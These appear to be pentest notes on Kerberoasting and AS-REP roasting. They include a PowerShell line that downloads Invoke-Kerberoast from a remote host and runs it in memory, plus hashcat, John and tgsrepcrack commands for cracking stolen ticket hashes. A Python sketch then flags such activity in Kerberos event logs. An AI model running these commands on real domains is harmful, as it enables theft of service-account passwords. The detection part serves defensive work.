Kerberoast attack
Download Invoke-Kerberoast, run it in memory, and output the service ticket hashes in a crackable (Hashcat) format.
(New-Object System.Net.WebClient).DownloadString('http://192.168.119.153/Invoke-Kerberoast.ps1') | IEX;Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat
Once that is done, copy the hashes to a file (hashes.kerberoast below) and crack them with John the Ripper or hashcat.
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
For AS-REP roasting:
GetNPUsers.py domain.local/ -usersfile users.txt -no-pass -format hashcat
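To crack a service ticket exported as a .kirbi file, use tgsrepcrack.py (general form, then an example):
tgsrepcrack.py wordlist.txt hash.kirbi
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi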
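Detection side, as an added example that is not part of the original notes: hashcat mode 13100 above targets etype 23 (RC4-HMAC) service tickets, so the sketch below flags requesters that pull RC4 tickets for several user-account services (event 4769) and accounts issued a TGT without pre-authentication (event 4768, PreAuthType 0). The sample records, the ev() helper, the account names and the threshold of 3 are assumptions made up for illustration.

```python
from collections import defaultdict

RC4_HMAC = "0x17"   # etype 23, the ticket type hashcat mode 13100 cracks
SPN_THRESHOLD = 3   # assumed tuning value: distinct services per requester

def ev(event_id, user, service, etype, ip, preauth=None):
    """Build one constructed record using the 4768/4769 event field names."""
    return {"EventID": event_id, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "IpAddress": ip,
            "PreAuthType": preauth, "Status": "0x0"}

# Constructed sample data, not real logs (accounts and addresses are made up).
EVENTS = [
    ev(4769, "jdoe@CORP.EXAMPLE", "svc_sql", "0x17", "10.0.0.23"),
    ev(4769, "jdoe@CORP.EXAMPLE", "svc_web", "0x17", "10.0.0.23"),
    ev(4769, "jdoe@CORP.EXAMPLE", "svc_backup", "0x17", "10.0.0.23"),
    ev(4769, "jdoe@CORP.EXAMPLE", "FILE01$", "0x17", "10.0.0.23"),
    ev(4769, "asmith@CORP.EXAMPLE", "svc_sql", "0x12", "10.0.0.40"),
    ev(4768, "svc_legacy", "krbtgt", "0x17", "10.0.0.23", preauth="0"),
    ev(4768, "asmith", "krbtgt", "0x12", "10.0.0.40", preauth="2"),
]

def kerberoast_suspects(events, threshold=SPN_THRESHOLD):
    """Requesters that got RC4 tickets for >= threshold distinct user services."""
    seen = defaultdict(set)
    for e in events:
        if e.get("EventID") != 4769 or e.get("Status") != "0x0":
            continue
        svc = e.get("ServiceName") or ""
        # Machine accounts ('$') and krbtgt use long random keys, so skip them.
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        if (e.get("TicketEncryptionType") or "").lower() == RC4_HMAC:
            seen[(e["TargetUserName"], e["IpAddress"])].add(svc)
    return {k: sorted(v) for k, v in seen.items() if len(v) >= threshold}

def asrep_roast_candidates(events):
    """Accounts that were issued a TGT without pre-authentication."""
    return sorted({e["TargetUserName"] for e in events
                   if e.get("EventID") == 4768 and e.get("Status") == "0x0"
                   and str(e.get("PreAuthType")) == "0"})

if __name__ == "__main__":
    print("Possible Kerberoasting:", kerberoast_suspects(EVENTS))
    print("No pre-auth TGTs issued to:", asrep_roast_candidates(EVENTS))
```

Accounts returned by asrep_roast_candidates are the ones to fix by re-enabling Kerberos pre-authentication; services returned by kerberoast_suspects are candidates for AES-only encryption and long random passwords.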